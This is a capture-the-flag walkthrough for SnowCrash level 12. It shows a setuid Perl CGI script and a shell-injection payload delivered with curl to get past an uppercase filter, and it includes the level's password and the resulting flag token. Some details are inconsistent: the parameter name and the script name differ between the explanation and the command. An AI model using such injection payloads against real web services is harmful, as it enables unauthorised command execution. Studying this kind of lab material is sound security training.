117 lines
2.6 KiB
Markdown
117 lines
2.6 KiB
Markdown
# Level 12
|
|
|
|
## how to login
|
|
|
|
username: level12
|
|
|
|
password: fa6v5ateaw21peobuub8ipe6s
|
|
|
|
## Goal
|
|
|
|
run `getflag` as user `flag12`
|
|
|
|
## Actually doing something
|
|
|
|
```bash
|
|
level12@SnowCrash:~$ ll
|
|
total 16
|
|
dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./
|
|
d--x--x--x 1 root users 340 Aug 30 2015 ../
|
|
-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout*
|
|
-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc*
|
|
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl*
|
|
-r-x------ 1 level12 level12 675 Apr 3 2012 .profile*
|
|
```
|
|
|
|
Perl again...
|
|
|
|
```perl
|
|
level12@SnowCrash:~$ cat level12.pl
|
|
#!/usr/bin/env perl
|
|
# localhost:4646
|
|
use CGI qw{param};
|
|
print "Content-type: text/html\n\n";
|
|
|
|
sub t {
|
|
$nn = $_[1];
|
|
$xx = $_[0];
|
|
$xx =~ tr/a-z/A-Z/;
|
|
$xx =~ s/\s.*//;
|
|
@output = `egrep "^$xx" /tmp/xd 2>&1`;
|
|
foreach $line (@output) {
|
|
($f, $s) = split(/:/, $line);
|
|
if($s =~ $nn) {
|
|
return 1;
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
sub n {
|
|
if($_[0] == 1) {
|
|
print("..");
|
|
} else {
|
|
print(".");
|
|
}
|
|
}
|
|
|
|
n(t(param("x"), param("y")));
|
|
```
|
|
a bit more involed, lets try to make it more pretty
|
|
|
|
```perl
|
|
#!/usr/bin/env perl
|
|
# localhost:4646
|
|
use CGI qw{param};
|
|
print "Content-type: text/html\n\n";
|
|
|
|
sub t {
|
|
$arg2 = $_[1];
|
|
$arg1 = $_[0];
|
|
$arg1 =~ tr/a-z/A-Z/;
|
|
$arg1 =~ s/\s.*//;
|
|
@output = `egrep "^$arg1" /tmp/xd 2>&1`;
|
|
foreach $line (@output) {
|
|
($f, $s) = split(/:/, $line);
|
|
if($s =~ $arg2) {
|
|
return 1;
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
sub n {
|
|
if($_[0] == 1) {
|
|
print("..");
|
|
} else {
|
|
print(".");
|
|
}
|
|
}
|
|
|
|
n(t(param("x"), param("y")));
|
|
```
|
|
|
|
when looking at this, we basically spot an `egrep` meaning that we have a shell injection.
|
|
|
|
lets look at what is given to this string
|
|
|
|
first of all, we get called with two argument, lets call them by their http parameter names `x` and `y`
|
|
|
|
in the script they are also named `arg1` for `x` and `arg2` for `y`
|
|
|
|
arg2 doesn't matter for us, so lets ignore it
|
|
|
|
arg1 is converted to uppercase, and then we only keep erverything up to the first space;
|
|
|
|
so we want to execute something like last time, meaning that we want to instert something to stop the current comment
|
|
`";cmdhere`
|
|
|
|
but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase...
|
|
|
|
Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script
|
|
|
|
```bash
|
|
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
|
|
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
|
|
```
|
|
|